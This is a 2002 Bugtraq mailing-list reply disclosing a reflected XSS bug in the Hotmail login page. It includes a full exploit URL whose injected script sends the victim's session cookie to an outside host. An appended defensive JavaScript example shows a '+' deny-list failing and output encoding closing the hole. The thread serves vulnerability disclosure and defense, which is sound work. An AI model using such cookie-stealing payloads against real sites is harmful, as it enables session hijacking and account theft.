[27341] in bugtraq


RE: XSS bug in hotmail login page

daemon@ATHENA.MIT.EDU (Thor Larholm)
Tue Oct 8 13:06:41 2002

Message-ID: <52D05AEFB0D95C4BAD179A054A54CDEB03470DF3@mailsrv1.jubii.dk>
From: Thor Larholm <Thor@jubii.dk>
To: "'Russell Harding'" <hardingr@cunap.com>, Thor Larholm <Thor@jubii.dk>
Date: Tue, 8 Oct 2002 11:00:56 +0200 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"

> From: Russell Harding [mailto:hardingr@cunap.com]
> Is there another way to exploit this which I am not 
> seeing? Or does MSN actually have their act together
>  (in this particular case...)?
> 
>       -Russell
> 
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?

Sure there is; the first that springs to mind is the replace method,
which all strings have:

var myString = "hi $".replace('$','monkeyboy');
alert( myString ); // alerts "hi monkeyboy"

The first argument can be either a string or a regular expression.

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.replace('$',document.cookie));</script>&ct=1033054530&_setlang=",,-1,0,,,,

Regards
Thor Larholm
Jubii A/S - Internet Programmer
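Added example, not part of the thread above and not Hotmail's or Jubii's code: the point the reply makes is that blocking "+" (or "%2B") in a query parameter does not stop a script from assembling strings, so a character deny-list is the wrong fix for a reflected XSS in an HTML attribute. The block models that hypothetical deny-list, shows that the replace-based expression from the post never trips it, and then shows the mitigation that actually closes the bug: encoding the reflected value for the attribute context before it reaches the page. The filter, the attribute renderer and the sample input are all constructed for illustration.

```javascript
// Hypothetical deny-list of the kind the thread discusses: reject a parameter
// value if it contains a literal "+" or its URL encoding. Not the real login page's logic.
function rejectsPlus(value) {
  return value.includes('+') || /%2B/i.test(value);
}

// The replace trick from the post: produces "hi monkeyboy" without a single "+".
function buildWithReplace() {
  return 'hi $'.replace('$', 'monkeyboy');
}

// Contextual output encoding for a double-quoted HTML attribute. The five
// characters below are the ones that can close the attribute, open a tag or
// start an entity; everything else is left alone.
function escapeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side rendering of a reflected parameter into a hidden field,
// applying the encoder instead of a character deny-list.
function renderCbAttribute(cb) {
  return `<input type="hidden" name="cb" value="${escapeHtmlAttr(cb)}">`;
}

// Constructed input with the same shape as the post's payload: it closes the
// attribute and opens a script tag, and contains no "+" at all.
const constructedInput = '"><script>alert(1)</script>';

// Summarises the two observations: the deny-list never fires, the encoder
// keeps the value inside the attribute.
function demo() {
  const rendered = renderCbAttribute(constructedInput);
  return {
    denyListFires: rejectsPlus(constructedInput),                          // false
    replaceExpressionFires: rejectsPlus("'hi $'.replace('$','monkeyboy')"), // false
    rendered,
    tagSurvivesEncoding: /<script/i.test(rendered),                        // false
  };
}

console.log(buildWithReplace());
console.log(demo());
```

The encoder is deliberately small; a production page should use its framework's attribute-escaping helper, but the property it needs is the same: the decision is made on the output context, not on which characters the attacker had to avoid in the input.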
